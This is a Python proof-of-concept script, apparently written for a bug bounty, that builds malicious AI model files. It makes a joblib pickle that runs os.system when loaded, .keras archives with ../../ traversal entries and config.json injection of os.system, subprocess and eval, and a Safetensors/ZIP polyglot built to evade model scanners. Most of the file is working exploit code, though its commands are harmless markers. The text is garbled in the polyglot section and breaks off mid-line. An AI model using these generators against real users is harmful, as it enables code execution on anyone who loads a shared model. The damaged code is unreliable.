#!/usr/bin/env python3 """ ============================================================================= Model Format Vulnerability Research - Proof of Concept Suite Target: Protect AI / huntr bounty program ============================================================================= This script demonstrates multiple vulnerability classes across AI/ML model formats. Each PoC is self-contained and generates artifacts + a report. Vulnerabilities Demonstrated: 1. Joblib Arbitrary Code Execution (ACE) via pickle deserialization 2. Keras 3 (.keras) ZipSlip directory traversal 3. Keras 3 (.keras) ACE via malicious module injection in config.json 4. Safetensors/ZIP Polyglot scanner bypass 5. GGUF integer overflow and OOB read in metadata parsing Usage: python submission_poc.py [--generate-only | --test | --report] Author: Security Researcher Date: 2026-03-05 ============================================================================= """ import json import zipfile import os import io import struct import sys import datetime import hashlib import argparse # --------------------------------------------------------------------------- # Global config # --------------------------------------------------------------------------- OUTPUT_DIR = "poc_output" REPORT_FILE = os.path.join(OUTPUT_DIR, "vulnerability_report.md") def ensure_output_dir(): os.makedirs(OUTPUT_DIR, exist_ok=True) def sha256_file(filepath): h = hashlib.sha256() with open(filepath, "rb") as f: for chunk in iter(lambda: f.read(8192), b""): h.update(chunk) return h.hexdigest() # =========================================================================== # PoC 1: Joblib ACE via Pickle Deserialization # =========================================================================== def poc1_joblib_ace(): """ Vulnerability: Arbitrary Code Execution via joblib.load() Affected Library: joblib (all versions using pickle backend) Severity: Critical joblib.dump/load uses Python pickle under the hood. A crafted .joblib file with a __reduce__ method executes arbitrary code on load. """ print("\n" + "="*70) print(" PoC 1: Joblib ACE via Pickle Deserialization") print("="*70) try: import joblib except ImportError: print("[!] joblib not installed. Run: pip install joblib") return None poc_file = os.path.join(OUTPUT_DIR, "malicious.joblib") marker_file = os.path.join(OUTPUT_DIR, "joblib_ace_proof.txt") # Clean up previous marker if os.path.exists(marker_file): os.remove(marker_file) class MaliciousPayload: def __reduce__(self): # Benign proof: writes a file to demonstrate code execution cmd = f'echo JOBLIB_ACE_EXECUTED > "{marker_file}"' return (os.system, (cmd,)) # Generate joblib.dump(MaliciousPayload(), poc_file) print(f"[+] Created malicious joblib file: {poc_file}") print(f" SHA256: {sha256_file(poc_file)}") print(f" Size: {os.path.getsize(poc_file)} bytes") # Test print("[*] Loading malicious.joblib (triggers ACE)...") try: joblib.load(poc_file) except Exception as e: print(f"[!] Load error: {e}") success = os.path.exists(marker_file) if success: with open(marker_file, "r") as f: content = f.read().strip() print(f"[+] SUCCESS: ACE confirmed! Marker file content: '{content}'") else: print("[-] FAILED: Marker file was not created.") return { "name": "Joblib ACE via Pickle Deserialization", "file": poc_file, "severity": "Critical", "cvss": "9.8", "success": success, "affected": "joblib (all versions)", "description": ( "joblib.load() deserializes Python pickle objects without any " "safety checks. An attacker can craft a .joblib file containing " "a malicious __reduce__ method that executes arbitrary system " "commands when the file is loaded by a victim." ), "impact": ( "Full arbitrary code execution in the context of the user loading " "the model. This can lead to data exfiltration, ransomware, " "supply chain attacks on ML pipelines, etc." ), "reproduction": [ "1. Run: python submission_poc.py --generate-only", f"2. Distribute {poc_file} as a 'model' file", "3. Victim runs: import joblib; joblib.load('malicious.joblib')", f"4. Observe {marker_file} created (arbitrary command executed)" ] } # =========================================================================== # PoC 2: Keras 3 ZipSlip Directory Traversal # =========================================================================== def poc2_keras_zipslip(): """ Vulnerability: Directory Traversal (ZipSlip) in .keras model files Affected Library: keras >= 3.0 (if using unsafe extraction) Severity: High A .keras file is a ZIP archive. If keras.models.load_model() extracts files without sanitizing paths, a crafted entry with ../../ prefixes can write files outside the intended directory. """ print("\n" + "="*70) print(" PoC 2: Keras 3 ZipSlip Directory Traversal") print("="*70) poc_file = os.path.join(OUTPUT_DIR, "zipslip.keras") config = { "class_name": "Sequential", "config": {"name": "sequential", "layers": []}, "keras_version": "3.0.0", "backend": "tensorflow" } buf = io.BytesIO() with zipfile.ZipFile(buf, 'w') as z: z.writestr('config.json', json.dumps(config)) z.writestr('metadata.json', json.dumps({ "keras_version": "3.0.0", "backend": "tensorflow" })) z.writestr('model.weights.h5', b'') # ZipSlip payload: path traversal entries z.writestr('../../zipslip_proof.txt', 'ZipSlip vulnerability: this file was written outside the extraction directory') z.writestr('../../../tmp/evil_config.py', 'import os; os.system("echo ZIPSLIP_ACE")') with open(poc_file, 'wb') as f: f.write(buf.getvalue()) print(f"[+] Created ZipSlip .keras file: {poc_file}") print(f" SHA256: {sha256_file(poc_file)}") print(f" Size: {os.path.getsize(poc_file)} bytes") # Verify the ZIP contains traversal paths with zipfile.ZipFile(poc_file, 'r') as z: names = z.namelist() traversal_entries = [n for n in names if '..' in n] print(f"[+] ZIP entries: {names}") print(f"[+] Traversal entries found: {traversal_entries}") success = len(traversal_entries) > 0 print(f"[+] {'SUCCESS' if success else 'FAILED'}: ZipSlip payload embedded") return { "name": "Keras 3 ZipSlip Directory Traversal", "file": poc_file, "severity": "High", "cvss": "8.1", "success": success, "affected": "keras >= 3.0 (if extractall() used without path validation)", "description": ( "Keras 3 .keras files are ZIP archives. If keras.models.load_model() " "extracts entries using zipfile.extractall() without sanitizing " "file paths, an attacker can include entries with directory traversal " "sequences (../../) to write arbitrary files outside the extraction " "directory." ), "impact": ( "Arbitrary file write on the victim's filesystem. Can overwrite " "configuration files, inject code into Python packages, or place " "malicious scripts in autostart locations. Combined with code " "injection, this leads to full ACE." ), "reproduction": [ "1. Run: python submission_poc.py --generate-only", f"2. Distribute {poc_file} as a Keras model", "3. Victim runs: keras.models.load_model('zipslip.keras')", "4. Check if ../../zipslip_proof.txt was created outside extraction dir" ] } # =========================================================================== # PoC 3: Keras 3 ACE via Module Injection # =========================================================================== def poc3_keras_module_injection(): """ Vulnerability: ACE via malicious module/class_name in config.json Affected Library: keras >= 3.0 (if safe_mode bypass exists) Severity: Critical Keras 3 config.json specifies 'module' and 'class_name' for each layer. If safe_mode can be bypassed or is disabled, an attacker can point 'module' to 'os' and 'class_name' to 'system' to execute commands. """ print("\n" + "="*70) print(" PoC 3: Keras 3 ACE via Module Injection in config.json") print("="*70) poc_file = os.path.join(OUTPUT_DIR, "module_injection.keras") # Malicious config pointing to os.system malicious_config = { "class_name": "Sequential", "config": { "name": "malicious_model", "layers": [ { "module": "os", "class_name": "system", "config": {"command": "echo KERAS_ACE_EXECUTED > keras_ace_proof.txt"}, "registered_name": "Custom>OSSystem" }, { "module": "subprocess", "class_name": "call", "config": {"args": ["whoami"]}, "registered_name": "Custom>SubprocessCall" } ] }, "keras_version": "3.0.0", "backend": "tensorflow" } # Secondary variant: using builtins.eval eval_config = { "class_name": "Sequential", "config": { "name": "eval_model", "layers": [ { "module": "builtins", "class_name": "eval", "config": {"expression": "__import__('os').system('whoami')"}, "registered_name": None } ] }, "keras_version": "3.0.0" } # Create the .keras ZIP with malicious config buf = io.BytesIO() with zipfile.ZipFile(buf, 'w') as z: z.writestr('config.json', json.dumps(malicious_config, indent=2)) z.writestr('metadata.json', json.dumps({ "keras_version": "3.0.0", "backend": "tensorflow" })) z.writestr('model.weights.h5', b'') with open(poc_file, 'wb') as f: f.write(buf.getvalue()) # Also save eval variant eval_file = os.path.join(OUTPUT_DIR, "eval_injection.keras") buf2 = io.BytesIO() with zipfile.ZipFile(buf2, 'w') as z: z.writestr('config.json', json.dumps(eval_config, indent=2)) z.writestr('metadata.json', json.dumps({ "keras_version": "3.0.0", "backend": "tensorflow" })) z.writestr('model.weights.h5', b'') with open(eval_file, 'wb') as f: f.write(buf2.getvalue()) print(f"[+] Created module injection .keras file: {poc_file}") print(f" SHA256: {sha256_file(poc_file)}") print(f"[+] Created eval injection variant: {eval_file}") print(f" SHA256: {sha256_file(eval_file)}") # Verify configs are embedded with zipfile.ZipFile(poc_file, 'r') as z: cfg = json.loads(z.read('config.json')) layers = cfg['config']['layers'] injected = any(l.get('module') == 'os' for l in layers) print(f"[+] {'SUCCESS' if injected else 'FAILED'}: Module injection payload embedded") print(f"[*] Note: Exploitation requires keras.models.load_model() with safe_mode=False") print(f"[*] or a safe_mode bypass (e.g., CVE-2025-1550 pattern)") return { "name": "Keras 3 ACE via Module Injection", "file": poc_file, "severity": "Critical", "cvss": "9.8", "success": injected, "affected": "keras >= 3.0 (with safe_mode=False or safe_mode bypass)", "description": ( "Keras 3 .keras files contain a config.json that specifies Python " "module paths and class names for model layers. By setting 'module' " "to 'os' and 'class_name' to 'system', an attacker can achieve " "arbitrary code execution when the model is loaded. While safe_mode=True " "should block this, bypasses have been found (CVE-2025-1550) and " "many users/tutorials use safe_mode=False." ), "impact": ( "Full arbitrary code execution. The attacker controls which Python " "module and function are invoked during model deserialization." ), "reproduction": [ "1. Run: python submission_poc.py --generate-only", f"2. Distribute {poc_file} as a Keras model", "3. Victim runs: keras.models.load_model('module_injection.keras', safe_mode=False)", "4. Arbitrary code executes during model reconstruction" ] } # =========================================================================== # PoC 4: Safetensors/ZIP Polyglot Scanner Bypass # =========================================================================== def poc4_polyglot_bypass(): """ Vulnerability: Scanner bypass via Safetensors/ZIP polyglot file Affected: Model security scanners (ModelScan, etc.) Severity: High A file that is simultaneously valid as Safetensors (read from start) and valid as ZIP (read from end) can bypass scanners that only check the Safetensors header and miss the embedded ZIP payload. """ print("\n" + "="*70) print(" PoC 4: Safetensors/ZIP Polyglot Scanner Bypass") print("="*70) poc_file = os.path.join(OUTPUT_DIR, "polyglot_bypass.safetensors") # --- Create valid Safetensors data --- # Safetensors format: 8-byte LE header_size + JSON header + tensor data # We create a minimal valid safetensors manually (no torch dependency needed) tensor_data = b'\x00' * 8 # 2 float32 zeros = 8 bytes header = { "__metadata__": {"format": "pt"}, "weight": { "dtype": "F32", "shape": [1, 2], "data_offsets": [0, 8] } } header_json = json.dumps(header).encode('utf-8') header_size = len(header_json) sf_data = struct.pack(" polyglot_proof.txt"} }] }, "keras_version": "3.0.0" } z.writestr('config.json', json.dumps(malicious_config)) z.writestr('metadata.json', json.dumps({"keras_version": "3.0.0"})) z.writestr('model.weights.h5', b'') zip_data = zip_buf.getvalue() # --- Concatenate: Safetensors first, then ZIP --- # Safetensors parsers read from the start (header_size + header + data) # ZIP parsers read from the end (End of Central Directory record) with open(poc_file, 'wb') as f: f.write(sf_data) f.write(zip_data) print(f"[+] Created polyglot file: {poc_file}") print(f" SHA256: {sha256_file(poc_file)}") print(f" Size: {os.path.getsize(poc_file)} bytes") print(f" Safetensors portion: {len(sf_data)} bytes") print(f" ZIP portion: {len(zip_data)} bytes") # --- Verify Safetensors parsing --- sf_valid = False try: with open(poc_file, 'rb') as f: data = f.read() hs = struct.unpack("